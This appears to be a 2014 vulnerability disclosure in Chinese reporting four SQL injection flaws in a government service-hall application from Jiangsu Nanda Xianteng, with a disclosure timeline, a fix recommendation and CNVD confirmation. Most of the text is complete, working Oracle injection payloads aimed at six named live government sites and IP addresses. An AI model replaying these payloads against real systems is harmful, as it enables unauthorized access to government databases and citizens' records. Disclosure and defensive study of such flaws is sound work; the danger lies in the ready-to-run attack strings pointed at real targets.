2014-08-15: 细节已通知厂商并且等待厂商处理中
2014-08-20: 厂商已经确认,细节仅向厂商公开
2014-08-23: 细节向第三方安全合作伙伴开放
2014-10-14: 细节向核心白帽子及相关领域专家公开
2014-10-24: 细节向普通白帽子公开
2014-11-03: 细节向实习白帽子公开
2014-11-13: 细节向公众公开
某政务大厅系统4处SQL注射漏洞
存在漏洞的是江苏南大先腾信息产业有限公司开发的阳光政务系统,官方网站:http://www.centit.com/
由于没有演示站,所以对安装该系统的政务大厅进行黑盒测试。
测试网站:
http://www.ldzsc.gov.cn/ 连云港经济技术开发区行政大厅
http://218.92.49.74:8090/ganyunet/ 赣榆县政务大厅
http://218.92.50.139:8082/lygdhnet/ 东海县政务大厅
http://218.92.62.78/gnnet/ 灌南县政务大厅
http://218.92.14.22/gynet/ 灌云县政务大厅
http://61.132.0.36:8090/lygnet/ 连云港市政务大厅
1.由于/apply.do页面参数applicant未安全过滤导致SQL注射漏洞
2.由于/info/infomation.do页面参数no_未安全过滤导致SQL注射漏洞
3.由于/itemSearch.do页面参数itemObjectId未安全过滤导致SQL注射漏洞
4.由于/onlineApply.do页面参数depNo未安全过滤导致SQL注射漏洞
1.由于/apply.do页面参数applicant未安全过滤导致SQL注射漏洞
http://www.ldzsc.gov.cn/apply.dohttp://218.92.49.74:8090/ganyunet/apply.dohttp://218.92.50.139:8082/lygdhnet/apply.dohttp://218.92.62.78/gnnet/apply.dohttp://218.92.14.22/gynet/apply.dohttp://61.132.0.36:8090/lygnet/apply.doPOST DATA:action=&applicant=1' AND 9077=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(118)||CHR(58)),CHR(36),CHR(58)||CHR(110)||CHR(58)),CHR(64),CHR(58)||CHR(101)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'IpwQ' LIKE 'IpwQ&beginDate=2014-05-17&endDate=2014-06-17&org.apache.struts.taglib.html.TOKEN=cd9aecdb8a7f835c9c096d053627c508&type=-1
2.由于/info/infomation.do页面参数no_未安全过滤导致SQL注射漏洞
http://www.ldzsc.gov.cn/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://218.92.49.74:8090/ganyunet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://218.92.50.139:8082/lygdhnet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://218.92.62.78/gnnet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://218.92.14.22/gynet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1http://61.132.0.36:8090/lygnet/info/infomation.do?columnName=D%3A%5CPython27A8%D6%AA%B9%AB%B8%E6&infoID=51&method=showInfo&no_=-1' UNION ALL SELECT CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||NVL(CAST(USER AS VARCHAR(4000)),CHR(32))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58) FROM DUAL--%20&type=1
3.由于/itemSearch.do页面参数itemObjectId未安全过滤导致SQL注射漏洞
http://www.ldzsc.gov.cn/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://218.92.49.74:8090/ganyunet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://218.92.50.139:8082/lygdhnet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://218.92.62.78/gnnet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM 
DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://218.92.14.22/gynet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3http://61.132.0.36:8090/lygnet/itemSearch.do?itemObjectId=1' AND 6916=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(102)||CHR(58)),CHR(36),CHR(58)||CHR(111)||CHR(58)),CHR(64),CHR(58)||CHR(102)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun'='wooyun&password=null&praiseInfo=null&showInfo=3
4.由于/onlineApply.do页面参数depNo未安全过滤导致SQL注射漏洞
http://www.ldzsc.gov.cn/onlineApply.do?method=initQlxmhttp://218.92.49.74:8090/ganyunet/onlineApply.do?method=initQlxmhttp://218.92.50.139:8082/lygdhnet/onlineApply.do?method=initQlxmhttp://218.92.62.78/gnnet/onlineApply.do?method=initQlxmhttp://218.92.14.22/gynet/onlineApply.do?method=initQlxmhttp://61.132.0.36:8090/lygnet/onlineApply.do?method=initQlxmPOST DATA:address=3137 Laguna Street&applicantName=yuplrdbv&appName=yuplrdbv&depNo=1' AND 9077=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(112)||CHR(112)||CHR(112)||CHR(58)||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),CHR(32),CHR(58)||CHR(118)||CHR(58)),CHR(36),CHR(58)||CHR(110)||CHR(58)),CHR(64),CHR(58)||CHR(101)||CHR(58)),CHR(35),CHR(58)||CHR(97)||CHR(58)))||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'wooyun' LIKE 'wooyun&dep_No=&[email protected]&enterpriseCode=94102&fax=317-317-3137&itemType=1&item_id=-1&item_No=&linker=1&mobile=987-65-4329&org.apache.struts.taglib.html.TOKEN=dbdff5edec8670ee85d24b64ecd6b402&personCard=1&phone=555-666-0606&postCode=94102&sex=1&telephone=555-666-0606
修复建议:对数字型的参数进行类型判断和过滤。更根本的做法是对上述4处注入点统一改用参数化查询(预编译语句)绑定用户输入,而不是仅依赖过滤;如其中存在非数字型参数(例如 applicant 可能为文本),仅对数字型参数做判断并不能覆盖全部注入点。
危害等级:高
漏洞Rank:16
确认时间:2014-08-20 10:50
CNVD确认并复现所述漏洞情况,根据测试用例已经转由CNCERT下发给江苏分中心,由其后续协调相关用户处置。
暂无